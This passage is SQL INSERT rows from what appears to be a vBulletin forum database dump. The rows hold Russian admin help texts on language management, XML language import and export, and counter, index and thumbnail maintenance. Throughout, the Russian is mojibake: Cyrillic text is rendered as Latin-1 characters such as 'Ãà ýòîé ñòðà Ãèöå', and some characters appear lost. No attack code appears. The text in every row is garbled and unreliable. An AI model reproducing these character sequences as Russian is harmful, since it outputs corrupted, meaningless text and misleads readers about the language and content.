(22612, -1, 'language_delete_text', 'cphelptext', 'Ãòà ñòðà Ãèöà ïîçâîëÿåò âà ì óäà ëèòü ýòîò ÿçûê. Ãà æìèòå êÃîïêó \"Äà \" äëÿ óäà ëåÃèÿ ýòîãî ÿçûêà . Âîññòà ÃîâëåÃèå ÃåâîçìîæÃî.', 'vbulletin', '', 0, ''),
(22613, -1, 'language_delete_title', 'cphelptext', 'Óäà ëåÃèå ÿçûêà ', 'vbulletin', '', 0, ''),
(22614, -1, 'language_edit_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå âû ìîæåòå ðåäà êòèðîâà òü èëè ïåðåâîäèòü ôðà çû. Ôðà çà - òåêñòîâûé îòðûâîê, Ãà êîòîðûé ññûëà þòñÿ øà áëîÃû. Âñå ÿçûêè ñîäåðæà ò ôðà çû, ïåðåâåäåÃÃûå Ãà ñîîòâåòñòâóþùèå ÿçûêè. \r\n\r\nÊà æäà ÿ êîëîÃêà ôðà çû èìååò ñâîå Ãà çâà Ãèå (òà ê îÃà îòîáðà æà åòñÿ â øà áëîÃà õ), ôðà çó Ãà ñîîòâåòñòâóþùåì ÿçûêå (åñëè îÃà ïåðåâåäåÃà ) è ññûëêó äëÿ âîññòà ÃîâëåÃèÿ îáû÷Ãîãî çÃà ÷åÃèÿ. Óáåäèòåñü, ÷òî âû Ãà æà ëè \"Ñîõðà Ãèòü èçìåÃÃ¥Ãèÿ\" äëÿ ñîõðà ÃÃ¥Ãèÿ ïðîäåëà ÃÃîé ðà áîòû Ãà ýòîé ñòðà Ãèöå.', 'vbulletin', '', 0, ''),
(22615, -1, 'language_edit_title', 'cphelptext', 'Ãåäà êòèðîâà Ãèå ôðà ç', 'vbulletin', '', 0, ''),
(22616, -1, 'language_edit_settings_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå âû ìîæåòå ðåäà êòèðîâà òü Ãà ñòðîéêè äëÿ êîÃêðåòÃûõ ÿçûêîâ.', 'vbulletin', '', 0, ''),
(22617, -1, 'language_edit_settings_title', 'cphelptext', 'Ãåäà êòèðîâà Ãèå Ãà ñòðîåê ÿçûêà ', 'vbulletin', '', 0, ''),
(22618, -1, 'language_edit_settings_isdefault_text', 'cphelptext', 'Åñëè \"Äà \", òî ýòîò ÿçûê áóäåò ÿçûêîì ïî óìîë÷à Ãèþ äëÿ ó÷à ñòÃèêîâ ôîðóìà , êîòîðûå ÃÃ¥ âûáðà ëè ÿçûê ïîñëå ðåãèñòðà öèè, à òà êæå äëÿ òåõ, êòî åù¸ ÃÃ¥ çà ðåãèñòðèðîâà ëñÿ. \r\n\r\nÂû òà êæå ìîæåòå âûáðà òü ÿçûê ïî óìîë÷à Ãèþ â óïðà âëåÃèè ÿçûêà ìè.', 'vbulletin', '', 0, ''),
(22619, -1, 'language_edit_settings_isdefault_title', 'cphelptext', 'ßâëÿåòñÿ ÿçûêîì ïî óìîë÷à Ãèþ', 'vbulletin', '', 0, ''),
(22620, -1, 'language_files_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå âû ìîæåòå çà ãðóæà òü è ñêà ÷èâà òü ÿçûêîâûå Ãà ñòðîéêè âà øåãî ôîðóìà . ßçûêîâûå Ãà ñòðîéêè - Ãà áîð âñåõ ôðà ç, èñïîëüçóåìûõ ôîðóìîì, êîòîðûé ìîæåò áûòü ñêà ÷à à ñ vBulletin.com. \r\n\r\nÂû ìîæåòå òà êæå ñîõðà Ãÿòü Ãà ñòðîéêè ÿçûêà âà øåãî ôîðóìà , ÷òîáû ïåðåäà òü èõ äðóãèì ëþäÿì, åñëè âû ñäåëà ëè ïåðåâîä ïîëüçîâà òåëüñêîãî èÃòåðôåéñà Ãà äðóãîé ÿçûê.', 'vbulletin', '', 0, ''),
(22621, -1, 'language_files_title', 'cphelptext', 'Ñêà ÷èâà Ãèå è çà ãðóçêà ÿçûêîâûõ Ãà ñòðîåê', 'vbulletin', '', 0, ''),
(22622, -1, 'language_files_languageid_text', 'cphelptext', 'Âûáåðèòå ÿçûê, êîòîðûé âû æåëà åòå ñîõðà Ãèòü ê ñåáå Ãà êîìïüþòåð èç ñïèñêà âñåõ óñòà ÃîâëåÃÃûõ ÿçûêîâ Ãà âà øåì ôîðóìå.', 'vbulletin', '', 0, ''),
(22623, -1, 'language_files_languageid_title', 'cphelptext', 'ßçûê äëÿ cîõðà ÃÃ¥Ãèÿ', 'vbulletin', '', 0, ''),
(22624, -1, 'language_files_product_text', 'cphelptext', 'Âûáåðèòå ïðîäóêò, ôðà çû êîòîðîãî âû æåëà åòå ñêà ÷à òü.', 'vbulletin', '', 0, ''),
(22625, -1, 'language_files_product_title', 'cphelptext', 'Ãðîäóêò', 'vbulletin', '', 0, ''),
(22626, -1, 'language_files_filename_text', 'cphelptext', 'Ãòî Ãà çâà Ãèå âà øåãî ôà éëà ñ ÿçûêîì äëÿ ñîõðà ÃÃ¥Ãèÿ. Ãðåäïîëà ãà åòñÿ, ÷òî èìÿ êà ê-ëèáî ññûëà åòñÿ Ãà Ãà çâà Ãèå ÿçûêà .', 'vbulletin', '', 0, ''),
(22627, -1, 'language_files_filename_title', 'cphelptext', 'Èìÿ ôà éëà ñ ÿçûêîì', 'vbulletin', '', 0, ''),
(22628, -1, 'language_files_just_phrases_text', 'cphelptext', 'Ãîä \"Ãà ñòðîéêà ìè ÿçûêà \" ìû îáîçÃà ÷à åì Ãà ñòðîéêè, êîòîðûå âû âèäèòå ïðè Ãà æà òèè Ãà ññûëêó [Ãåäà êòèðîâà òü Ãà ñòðîéêè] â óïðà âëåÃèè ÿçûêà ìè . Åñëè ÿçûê ïðîñòî ïåðåâîäèò ôðà çû è ÃÃ¥ Ãåñåò äîïîëÃèòåëüÃûõ Ãà ñòðîåê, òî âû ìîæåòå âûáðà òü çäåñü \"Äà \".  îñòà ëüÃûõ ñëó÷à ÿõ ñëåäóåò âûáðà òü \"Ãåò\" äëÿ ñîõðà ÃÃ¥Ãèÿ ñòðóêòóðû ÿçûêà .', 'vbulletin', '', 0, ''),
(22629, -1, 'language_files_just_phrases_title', 'cphelptext', 'Ãðîñòî âûáîðêà ôðà ç', 'vbulletin', '', 0, ''),
(22630, -1, 'language_files_languagefile_text', 'cphelptext', 'Âûáåðèòå XML ôà éë ñ ÿçûêîì äëÿ çà ãðóçêè ñ âà øåãî êîìïüþòåðà .', 'vbulletin', '', 0, ''),
(22631, -1, 'language_files_languagefile_title', 'cphelptext', 'XML ôà éë ÿçûêà äëÿ çà ãðóçêè', 'vbulletin', '', 0, ''),
(22632, -1, 'language_files_serverfile_text', 'cphelptext', 'Ââåäèòå èìÿ ôà éëà âìåñòå ñ ïóòåì îò ãëà âÃîé äèðåêòîðèè âà øåãî ôîðóìà . \r\n\r\nÃà ïðèìåð, åñëè èìÿ ôà éëà ñ ÿçûêîì - vbulletin-language.xml, è âû çà ãðóçèëè åãî â äèðåêòîðèþ install âÃóòðè âà øåé ãëà âÃîé äèðåêòîðèè, òî âà ì ñëåäóåò ââåñòè ñþäà : [b]./install/vbulletin-language.xml[/b]', 'vbulletin', '', 0, ''),
(22633, -1, 'language_files_serverfile_title', 'cphelptext', 'Èìïîðòèðîâà Ãèå XML ôà éëà ', 'vbulletin', '', 0, ''),
(22634, -1, 'language_files_olanguageid_text', 'cphelptext', 'Åñëè âû æåëà åòå ïåðåçà ïèñà òü ñóùåñòâóþùèé ÿçûê çà ãðóæà åìûì ôà éëîì, òî âûáåðèòå åãî â ýòîì ìåÃþ.  ïðîòèâÃîì ñëó÷à å, óáåäèòåñü, ÷òî â ìåÃþ âûáðà Ãî \"(Ñîçäà òü Ãîâûé ÿçûê)\".', 'vbulletin', '', 0, ''),
(22635, -1, 'language_files_olanguageid_title', 'cphelptext', 'Ãåðåçà ïèñà òü ÿçûê', 'vbulletin', '', 0, ''),
(22636, -1, 'language_files_title_text', 'cphelptext', 'Ãòî òî, êà ê áóäåò Ãà çâà òüñÿ ýòîò ÿçûê Ãà ôîðóìå. Åñëè âû ïåðåçà ïèñûâà åòå ñóùåñòâóþùèé ÿçûê, òî òåêóùåå Ãà çâà Ãèå ÿçûêà çà ìåÃèòñÿ ýòîé ñòðî÷êîé.  ïðîòèâÃîì ñëó÷à å, Ãîâûé ÿçûê áóäåò èìåòü ýòî Ãà çâà Ãèå.', 'vbulletin', '', 0, ''),
(22637, -1, 'language_files_title_title', 'cphelptext', 'Ãà çâà Ãèå äëÿ Ãîâîãî ÿçûêà ', 'vbulletin', '', 0, ''),
(22638, -1, 'language_files_anyversion_text', 'cphelptext', 'Åñëè \"Äà \", òî âû ÃÃ¥ óâèäèòå ïðåäóïðåæäåÃèÿ, ñîîáùà þùåãî âà ì, ÷òî ÿçûê äà ÃÃîãî ôà éëà áûë ñîçäà à äëÿ âåðñèè ôîðóìà , îòëè÷Ãîé îò âà øåé. \r\n\r\nÎáû÷Ãî äîïóñêà åòñÿ èñïîëüçîâà Ãèå ÿçûêîâûõ ôà éëîâ, âåðñèÿ êîòîðûõ Ãîâåå âåðñèè ôîðóìà , Ãî åñëè ïåðåâîä âûïîëÃåà äëÿ áîëåå ñòà ðîé âåðñèè, òî åñòü âåðîÿòÃîñòü ïîÿâëåÃèÿ Ãîâûõ ôðà ç, êîòîðûå, ñîîòâåòñòâåÃÃî, ÃÃ¥ áóäóò ïåðåâåäåÃû.', 'vbulletin', '', 0, ''),
(22639, -1, 'language_files_anyversion_title', 'cphelptext', 'Èñïîëüçîâà òü ôà éë ÿçûêà , äà æå åñëè îà áûë ñîçäà à äëÿ äðóãîé âåðñèè ôîðóìà ', 'vbulletin', '', 0, ''),
(22640, -1, 'language_modify_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå Ãà õîäèòñÿ ñïèñîê âñåõ óñòà ÃîâëåÃÃûõ ÿçûêîâ. Çà êà æäûì ÿçûêîì èäåò ñïèñîê âûïà äà þùåãî ìåÃþ, ñîäåðæà ùåãî ñåðèþ îïöèé äëÿ ðåäà êòèðîâà Ãèÿ ôðà ç, à òà êæå ññûëêè äëÿ èçìåÃÃ¥Ãèÿ Ãà ñòðîåê ÿçûêà è åãî ñêà ÷èâà Ãèÿ. \r\n\r\nÂûáðà â ýëåìåÃò â âûïà äà þùåì ñïèñêå (ðåäà êòèðîâà Ãèå), âû ñìîæåòå îòðåäà êòèðîâà òü ñïèñîê âûáðà ÃÃûõ ôðà ç, Ãà ïðèìåð, ôðà çû ëè÷Ãûõ ñîîáùåÃèé èëè îøèáîê. \r\n\r\nÃà æà â Ãà \"Ãà ñòðîéêè\", âû ñìîæåòå îòðåäà êòèðîâà òü Ãà ñòðîéêè ÿçûêà . \r\n\r\nÃà æà òèå Ãà êÃîïêó \"Óäà ëèòü\" óäà ëèò ÿçûê èç âà øåãî ôîðóìà . \r\n\r\nÑêà ÷èâà Ãèå ïîçâîëÿåò ñêà ÷à òü ÿçûêîâóþ Ãà ñòðîéêó, êîòîðà ÿ ñîäåðæèò âñå ôðà çû, êîòîðûå âû ïåðåâåëè. Âû ìîæåòå ðà ñïðîñòðà Ãÿòü å¸ ñðåäè à äìèÃèñòðà òîðîâ, èñïîëüçóþùèõ ôîðóì. \r\n\r\nÊÃîïêà \"Ãî óìîë÷à Ãèþ\" ïîçâîëÿåò âà ì óñòà Ãîâèòü ýòîò ÿçûê èñïîëüçóåìûì ïî óìîë÷à Ãèþ Ãà âà øåì ôîðóìå. ßçûê ïî óìîë÷à Ãèþ áóäåò èñïîëüçîâà òüñÿ äëÿ çà ðåãèñòðèðîâà ÃÃûõ ó÷à ñòÃèêîâ, êîòîðûå ÃÃ¥ âûáðà ëè ÿçûê ïîñëå ðåãèñòðà öèè, à òà êæå äëÿ òåõ, êòî ÃÃ¥ âîøåë Ãà ôîðóì ïîä ñâîèì èìåÃåì ïîëüçîâà òåëÿ. \r\n\r\nÂÃèçó Ãà õîäèòñÿ ñïèñîê ññûëîê äëÿ äîáà âëåÃèÿ Ãîâîãî ÿçûêà , à òà êæå äëÿ ñêà ÷èâà Ãèÿ è çà êà ÷èâà Ãèÿ ñóùåñòâóþùèõ ÿçûêîâûõ Ãà ñòðîåê.', 'vbulletin', '', 0, ''),
(22641, -1, 'language_modify_title', 'cphelptext', 'ÈçìåÃÃ¥Ãèå ÿçûêîâ', 'vbulletin', '', 0, ''),
(22642, -1, 'language_rebuild_text', 'cphelptext', 'Ãòà ñòðà Ãèöà - ïîäòâåðæäåÃèå è ñîîáùåÃèå î òîì, ÷òî âà øè ÿçûêè ïåðåñòðà èâà þòñÿ. Ãà æìèòå êÃîïêó \"ÂûïîëÃÃ¥Ãî\" äëÿ âîçâðà ùåÃèÿ ê óïðà âëåÃèþ ÿçûêà ìè.', 'vbulletin', '', 0, ''),
(22643, -1, 'language_rebuild_title', 'cphelptext', 'ÃåðåñòðîåÃèå ÿçûêîâ', 'vbulletin', '', 0, ''),
(22644, -1, 'misc_text', 'cphelptext', 'Ñïðà âî÷Ãûå ñòà òüè: \r\nÃåçåðâÃîå êîïèðîâà Ãèå áà çû äà ÃÃûõ \r\nÂîññòà ÃîâëåÃèå/îïòèìèçà öèÿ \r\nÎáÃîâëåÃèå ñ÷¸ò÷èêîâ \r\nÄèà ãÃîñòèêà \r\nÈñïîëÃÃ¥Ãèå SQL çà ïðîñà \r\nÎáÃîâëåÃèå ñ÷¸ò÷èêîâ: \r\nÃòà ñòðà Ãèöà ïîçâîëèò âà ì îáÃîâèòü Ãåêîòîðûå ñ÷¸ò÷èêè ôîðóìà . ÄèÃà ìè÷åñêè ãåÃåðèðóåòñÿ è ïîäñ÷èòûâà åòñÿ \"Ãà ëåòó\" ÃÃ¥ âñÿ ÷èñëîâà ÿ èÃôîðìà öèÿ, îòîáðà æà åìà ÿ Ãà ñòðà Ãèöà õ ôîðóìà . Äëÿ óìåÃüøåÃèÿ Ãà ãðóçêè Ãà ñåðâåð Ãåêîòîðûå \"ñ÷¸ò÷èêè\" âû÷èñëÿþòñÿ ÃÃ¥ ïðè ãåÃåðà öèè ñòðà Ãèöû, à òîëüêî ïðè ôà êòè÷åñêîì èçìåÃÃ¥Ãèè ïîäëåæà ùåãî ïîäñ÷¸òó. \r\nÃà ïðèìåð, ñ÷¸ò÷èê ñîîáùåÃèé ïîëüçîâà òåëÿ. Äâèæîê ôîðóìà ÃÃ¥ ïîä÷èòûâà åò ÷èñëî ñîîáùåÃèé ïîëüçîâà òåëÿ êà æäûé ðà ç, êîãäà ýòî ÷èñëî îòîáðà æà åòñÿ Ãà ôîðóìå. Âìåñòî ýòîãî ñ÷¸ò÷èê ñîîáùåÃèé ïîëüçîâà òåëÿ óâåëè÷èâà åò ñâîå çÃà ÷åÃèå Ãà åäèÃèöó ïðè ðà çìåùåÃèè êà æäîãî Ãîâîãî ñîîáùåÃèÿ. Ãîýòîìó, êîãäà òðåáóåòñÿ îòîáðà çèòü ÷èñëî ñîîáùåÃèé ó÷à ñòÃèêà , èÃôîðìà öèÿ áåðåòñÿ ïðîñòî èç ñ÷¸ò÷èêà .', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(22645, -1, 'misc_title', 'cphelptext', 'Îá îáÃîâëåÃèè ñ÷¸ò÷èêîâ', 'vbulletin', '', 0, ''),
(22646, -1, 'misc_chooser_text', 'cphelptext', 'Ãòà ñòðà Ãèöà âêëþ÷à åò â ñåáÿ Ãåñêîëüêî îïöèé ïî îáÃîâëåÃèþ ñ÷¸ò÷èêîâ. \r\n\r\nÎáÃîâëåÃèå ðà çäåëîâ: \r\nÃòà îïöèÿ îáÃîâèò èÃôîðìà öèþ î êà æäîì ðà çäåëå, âêëþ÷à ÿ èÃôîðìà öèþ î ïîñëåäÃåì ñîîáùåÃèè, ñ÷¸ò÷èêè òåì è ñîîáùåÃèé. Ãòî ìîæåò ïîòðåáîâà òüñÿ ñäåëà òü ïîñëå ìà ññîâîãî ïåðåìåùåÃèÿ/óäà ëåÃèÿ òåì è ñîîáùåÃèé. \r\n\r\nÎáÃîâëåÃèå ñòà òóñîâ è çâà Ãèé ïîëüçîâà òåëåé: \r\nÃðîâåðêà âñåõ ïîëüçîâà òåëåé Ãà âà øåì ôîðóìå Ãà ïðà âèëüÃîñòü ñòà òóñà è çâà Ãèÿ ïîëüçîâà òåëÿ. Ãòî ìîæåò ïîòðåáîâà òüñÿ ñäåëà òü ïîñëå èçìåÃÃ¥Ãèÿ âà øåé ëåñòÃèöû ñòà òóñîâ ïîëüçîâà òåëåé èëè çâà Ãèé ïîëüçîâà òåëåé . \r\n\r\nÎáÃîâëåÃèå èì¸à ïîëüçîâà òåëåé: \r\nÎáÃîâëåÃèå èì¸à ïîëüçîâà òåëåé âî âñåõ ìåñòà õ Ãà âà øåì ôîðóìå. Ãòî ìîæåò ïîòðåáîâà òüñÿ ñäåëà òü ïîñëå èçìåÃÃ¥Ãèÿ èìåÃè ïîëüçîâà òåëÿ â ïà Ãåëè à äìèÃèñòðà òîðà . \r\n\r\nÎáÃîâëåÃèå ñ÷¸ò÷èêîâ ñîîáùåÃèé: \r\nÎáÃîâëåÃèå êîëè÷åñòâà ñîîáùåÃèé äëÿ êà æäîãî ïîëüçîâà òåëÿ, ñ ïîìîùüþ ïîäñ÷¸òà âñåõ ñîîáùåÃèé ïîëüçîâà òåëÿ â áà çå äà ÃÃûõ. Åñëè âû ñà ìîñòîÿòåëüÃî èçìåÃèëè ñ÷¸ò÷èê ñîîáùåÃèé ïîëüçîâà òåëÿ ñ ïîìîùüþ ðåäà êòèðîâà Ãèÿ åãî ïðîôèëÿ â ïà Ãåëè à äìèÃèñòðà òîðà , òî ýòà îïöèÿ óñòà Ãîâèò Ãà ñòîÿùåå çÃà ÷åÃèå. \r\n\r\nÈñïðà âëåÃèå îøèáî÷Ãûõ ïðîôèëåé ïîëüçîâà òåëåé: \r\nÃåïîëÃûå ïðîôèëè îáû÷Ãî ÿâëÿþòñÿ ðåçóëüòà òîì ïðîäóêòîâ, ñîçäà þùèõ ïîëüçîâà òåëüñêèå âñòà âêè âÃÃ¥ ôîðóìà . Çà ïóñòèòå ýòó îïöèþ äëÿ èñïðà âëåÃèÿ âñåõ îøèáî÷Ãûõ ïðîôèëåé. \r\n\r\nÃåðåñòðîåÃèå èÃôîðìà öèè î ðà çäåëà õ: \r\nÃòà îïöèÿ îáÃîâèò âà øè ñ÷¸ò÷èêè ðà çäåëîâ è ïðîâåðèò Ãà Ãà ëè÷èå ìîäåðà òîðîâ áåç óêà çà Ãèÿ ðà çäåëà . Ãòî ìîæåò ïîòðåáîâà òüñÿ ñäåëà òü ïîñëå óïðà âëåÃèÿ Ãà ä ðà çäåëà ìè. \r\n\r\nÃåðåñòðîåÃèå èÃôîðìà öèè î òåìà õ: \r\nÃòà îïöèÿ îáÃîâèò âà øè ñ÷¸ò÷èêè òåì: èÃôîðìà öèþ î ïîñëåäÃåì ñîîáùåÃèè, ñ÷¸ò÷èê îòâåòîâ è ïðîñìîòðîâ è ò.ä. âà ì ìîæåò ïîòðåáîâà òüñÿ ýòî ñäåëà òü ïîñëå ïåðåìåùåÃèÿ/óäà ëåÃèÿ òåì è ñîîáùåÃèé. \r\n\r\nÃåðåñòðîåÃèå ïîõîæèõ òåì: \r\nÃòà îïöèÿ çà ïóñòèò ïîèñê ïîõîæèõ òåì ñðåäè âñåõ òåì âà øåãî ôîðóìà . ×òîáû îòîáðà çèòü ïîõîæèå òåìû âà ì ñëåäóåò âêëþ÷èòü ñîîòâåòñòâóþùóþ îïöèþ â îñÃîâÃûõ Ãà ñòðîéêà õ . Åñëè âû æåëà åòå çà ïóñòèòü ïîèñê ïîõîæèõ òåì ïðè ïîÿâëåÃèè Ãîâîé òåìû (ïðåäïî÷òèòåëüÃî çà ïóñòèòü ïåðåñòðîåÃèå ïîçæå) òî âà ì ñëåäóåò âêëþ÷èòü ñîîòâåòñòâóþùóþ îïöèþ Ãà ýòîé ñòðà Ãèöå . \r\n\r\nÃåðåñòðîåÃèå èÃäåêñà ïîèñêà : \r\nÃòî äîëæÃî áûòü ñäåëà Ãî ïîñëå èçìåÃÃ¥Ãèÿ ìà êñèìà ëüÃîé/ìèÃèìà ëüÃîé äëèÃû ñëîâà äëÿ ïîèñêà â âà øèõ îñÃîâÃûõ Ãà ñòðîéêà õ . \r\n\r\nÃåðåñòðîåÃèå ñòà òèñòèêè: \r\nÃòà îïöèÿ ïåðåñòðîèò èÃôîðìà öèþ, îòîáðà æà þùóþñÿ Ãà âà øåé ñòðà Ãèöå ñòà òèñòèêè . \r\n\r\nÃåðåñòðîåÃèå êýøà ñîîáùåÃèé: \r\nÔîðóì ÃÃ¥ ðà ñïîçÃà åò BB êîäû êà æäûé ðà ç ïðè îòîáðà æåÃèè åãî â ñîîáùåÃèÿõ. Âìåñòî ýòîãî ðà ñïîçÃà ÃÃûå ñîîáùåÃèÿ ñîõðà Ãÿþòñÿ â òà áëèöó \"postparsed\". Òà ê ôîðóì ñîêðà ùà åò âðåìÿ îáðà áîòêè ïåðåä îòîáðà æåÃèåì ñîîáùåÃèÿ. Èñïîëüçóéòå ýòó îïöèþ äëÿ ïåðåñòðîåÃèÿ ðà çîáðà ÃÃûõ ñîîáùåÃèé. Ãòî ìîæåò ïîòðåáîâà òüñÿ ïîñëå èçìåÃÃ¥Ãèÿ BB êîäîâ, äîïîëÃèòåëüÃûõ ðà çðåøåÃèé äëÿ èñïîëüçîâà Ãèÿ â ñîîáùåÃèÿõ (Ãà ïðèìåð HTML êîäà ) è òà ê äà ëåå. \r\n\r\nÓäà ëåÃèå äóáëèðóþùèõñÿ òåì: \r\nÈÃîãäà äóáëèðóþùèåñÿ òåìû ñîçäà þòñÿ ñëó÷à éÃî ïðè ñîçäà Ãèè Ãîâîé òåìû. Ãòà îïöèÿ óäà ëèò äóáëèêà òû. \r\n\r\nÃåðåñòðîåÃèå ñòèëåé: \r\nÃòà îïöèÿ ïåðåñòðîèò ñòðóêòóðó âà øèõ ñòèëåé. \r\n\r\nÃåðåñòðîåÃèå ìèÃèà òþð âëîæåÃèé: \r\nÃåðåñòðîåÃèå ìèÃèà òþð Ãåîáõîäèìî ïîñëå èçìåÃÃ¥Ãèÿ ïà ðà ìåòðîâ ìèÃèà òþð â âà øèõ îñÃîâÃûõ Ãà ñòðîéêà õ ôîðóìà . \r\n\r\nÃåðåñòðîåÃèå ðåïóòà öèè ïîëüçîâà òåëåé: \r\nÂà ì ñëåäóåò èñïîëüçîâà òü ýòó îïöèþ, åñëè âû èçìåÃèëè çÃà ÷åÃèå ïî óìîë÷à Ãèþ ðåïóòà öèè â âà øèõ îñÃîâÃûõ Ãà ñòðîéêà õ ôîðóìà . >\r\n\r\nÓäà ëåÃèå òåì áåç ðà çäåëîâ: \r\nÃòà ôóÃêöèÿ óäà ëèò âñå òåìû, êîòîðûå ÃÃ¥ ïðèÃà äëåæà ò Ãè îäÃîìó ñóùåñòâóþùåìó ðà çäåëó. Äîñòóï ê òà êèì òåìà ì Ãåäîñòóïåà ÷åðåç ðà çäåëû, Ãî îÃè äîáà âëÿþòñÿ ê ñóììå âà øèõ òåì. Âû óâèäèòå êîëè÷åñòâî òåì áåç ðà çäåëîâ â ñêîáêà õ. \r\n\r\nÓäà ëåÃèå ñîîáùåÃèé áåç òåì: \r\nÃòà ôóÃêöèÿ óäà ëèò âñå ñîîáùåÃèÿ, êîòîðûå ÃÃ¥ ïðèÃà äëåæà ò Ãè îäÃîé ñóùåñòâóþùåé òåìå. Äîñòóï ê òà êèì ñîîáùåÃèÿì Ãåäîñòóïåà ÷åðåç ðà çäåëû, Ãî îÃè äîáà âëÿþòñÿ ê ñóììå âà øèõ ñîîáùåÃèé. Âû óâèäèòå êîëè÷åñòâî ñîîáùåÃèé áåç òåì â ñêîáêà õ.', 'vbulletin', 'zCarot', 1206964458, '3.7.0 Release Candidate 2'),
(22647, -1, 'misc_chooser_title', 'cphelptext', 'ÎáÃîâëåÃèå ñ÷¸ò÷èêîâ', 'vbulletin', '', 0, ''),
(22648, -1, 'misc_chooser_quality_text', 'cphelptext', 'Îïðåäåëÿåò êà ÷åñòâî ãåÃåðèðóåìûõ ìèÃèà òþð. ×åì âûøå çÃà ÷åÃèå, òåì âûøå êà ÷åñòâî. ×åì ìåÃüøå çÃà ÷åÃèå, òåì ìåÃüøå ðà çìåð ôà éëà .', 'vbulletin', 'zCarot', 1220959120, '3.8.0 Alpha 1'),
(22649, -1, 'misc_chooser_quality_title', 'cphelptext', 'Êà ÷åñòâî ìèÃèà òþð JPG', 'vbulletin', 'zCarot', 1220959120, '3.8.0 Alpha 1'),
(22650, -1, 'misc_chooser_perpage_text', 'cphelptext', 'Çäåñü âû ìîæåòå óêà çà òü êîëè÷åñòâî ðà çäåëîâ/ïîëüçîâà òåëåé/òåì/ñîîáùåÃèé/âëîæåÃèé, îáðà áà òûâà åìûõ îäÃîâðåìåÃÃî. Ãòî ÷èñëî äîëæÃî áûòü ìåÃüøå äëÿ áîëüøèõ ôîðóìîâ, òà ê êà ê âîçìîæåà òà éìà óò.', 'vbulletin', '', 0, ''),
(22651, -1, 'misc_chooser_perpage_title', 'cphelptext', '×èñëî ðà çäåëîâ äëÿ îáðà áîòêè çà öèêë', 'vbulletin', '', 0, ''),
(22652, -1, 'misc_chooser_startat_text', 'cphelptext', 'ID ñîîáùåÃèÿ äëÿ Ãà ÷à ëà èÃäåêñà öèè. Åñëè âû ïåðåèÃäåêñèðóåòå, è ïðîöåññ îñòà Ãîâèòñÿ ïî êà êèì-ëèáî ïðè÷èÃà ì, òî âû ìîæåòå ïðîäîëæèòü ñ ìåñòà ïðåðûâà Ãèÿ.', 'vbulletin', 'zCarot', 1205941526, '3.7.0 Release Candidate 1'),
(22653, -1, 'misc_chooser_startat_title', 'cphelptext', 'ID ñîîáùåÃèÿ Ãà ÷èÃà åòñÿ ñ', 'vbulletin', '', 0, ''),
(22654, -1, 'misc_chooser_doprocess_text', 'cphelptext', 'Çäåñü âû ìîæåòå óêà çà òü îáùåå êîëè÷åñòâî ñîîáùåÃèé äëÿ îáðà áîòêè, Ãà ÷èÃà ÿ ñ ñîîáùåÃèÿ ñ ID, óêà çà ÃÃûì âûøå.', 'vbulletin', '', 0, ''),
(22655, -1, 'misc_chooser_doprocess_title', 'cphelptext', 'Êîëè÷åñòâî ñîîáùåÃèé äëÿ îáðà áîòêè', 'vbulletin', '', 0, ''),
(22656, -1, 'misc_chooser_autoredirect_text', 'cphelptext', 'Åñëè \"Äà \", òî ñêðèïò à âòîìà òè÷åñêè ïåðåéäåò ê ñëåäóþùåìó öèêëó ïîñëå çà âåðøåÃèÿ òåêóùåãî. Ñëåäóåò óñòà Ãîâèòü Ãà \"Ãåò\", åñëè âû ÃÃ¥ æåëà åòå ðà çðåøà òü ñêðèïòó ïåðåõîäèòü ê ñëåäóþùåìó öèêëó ñà ìîñòîÿòåëüÃî.', 'vbulletin', '', 0, ''),
(22657, -1, 'misc_chooser_autoredirect_title', 'cphelptext', 'Âêëþ÷èòü à âòîìà òè÷åñêîå ïåðåÃà ïðà âëåÃèå JavaScript`îì Ãà ñëåäóþùóþ ñòðà Ãèöó', 'vbulletin', '', 0, ''),
(22658, -1, 'misc_chooser_install_text', 'cphelptext', 'Ñòèëè ñ îòñóòñòâèåì ïðåäûäóùåé èÃôîðìà öèè - îøèáî÷Ãû. Ãòî îïöèÿ ïðîâåðèò Ãà Ãà ëè÷èå òà êèõ îøèáî÷Ãûõ ñòèëåé.', 'vbulletin', '', 0, ''),
(22659, -1, 'misc_chooser_install_title', 'cphelptext', 'Ãðîâåðèòü âñå îñÃîâÃûå ñòèëè', 'vbulletin', '', 0, ''),
(22660, -1, 'misc_chooser_renumber_text', 'cphelptext', 'ÃåðåÃóìåðîâûâà åò ID øà áëîÃîâ, äåëà ÿ èõ çÃà ÷åÃèÿ óïîðÿäî÷åÃÃûìè. Ãòî ÃÃ¥ èìååò îñîáîãî ôóÃêöèîÃà ëüÃîãî çÃà ÷åÃèÿ, à ïðîñòî îñâîáîæäà åò Ãåêîòîðûå ID øà áëîÃîâ, ïîýòîìó âû ìîæåòå ÃÃ¥ çà ïóñêà òü ýòó ôóÃêöèþ.', 'vbulletin', '', 0, ''),
(22661, -1, 'misc_chooser_renumber_title', 'cphelptext', 'ÃåðåÃóìåðîâà òü âñå øà áëîÃû ñ 1', 'vbulletin', '', 0, ''),
(22662, -1, 'misc_chooser_reputation_base_text', 'cphelptext', 'Âñå ïîëüçîâà òåëè ñ ðåïóòà öèåé âûøå èëè ðà âÃîé, óêà çà ÃÃîé çäåñü, áóäóò îáðà áîòà Ãû.', 'vbulletin', '', 0, ''),
(22663, -1, 'misc_chooser_reputation_base_title', 'cphelptext', 'Ãà çîâîå çÃà ÷åÃèå ðåïóòà öèè', 'vbulletin', '', 0, ''),
